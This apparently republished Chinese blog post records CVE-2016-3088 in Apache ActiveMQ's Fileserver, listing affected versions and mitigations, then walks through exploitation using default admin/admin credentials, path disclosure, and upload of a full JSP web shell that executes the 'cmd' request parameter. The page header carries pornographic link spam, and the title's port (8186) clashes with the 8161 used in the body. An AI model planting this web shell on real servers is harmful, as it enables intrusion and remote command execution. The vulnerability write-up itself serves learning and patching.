日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Apache ActiveMQ 远程代码执行漏洞记录(CVE-2016-3088,端口:8186)

發布時間:2025/3/15 编程问答 22 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Apache ActiveMQ 远程代码执行漏洞记录(CVE-2016-3088,端口:8186) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞描述

2016年4月14日,國外安全研究人員 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多個安全漏洞,可使遠程攻擊者用惡意代碼替代Web應用,在受影響系統上執行遠程代碼(CVE-2016-3088)。

漏洞影響版本

Apache ActiveMQ 5.x ~ 5.14.0。

漏洞防護方案

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級至 5.14.0 及其以后版本。

2、通過移除?conf\jetty.xml?的以下配置來禁用 ActiveMQ Fileserver 功能。

漏洞復現

直接寫?shell

寫 shell 的話,需要寫在 admin 或者 api 中,也就是需要登錄,沒有密碼的話完成不了寫 shell 操作。

該環境默認的口令為 admin/admin。

訪問?http://ip:8161/admin/test/systemProperties.jsp

獲得當前系統的路徑

上傳 jsp 小馬 2.txt,返回204,但是在 fileserver 路徑下不解析

<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %>

然后移動到 api 目錄下,成功的話,返回 204 No Content

執行命令

http://192.168.8.24:8161/api/9.jsp?cmd=ls

總結

以上是生活随笔為你收集整理的Apache ActiveMQ 远程代码执行漏洞记录(CVE-2016-3088,端口:8186)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。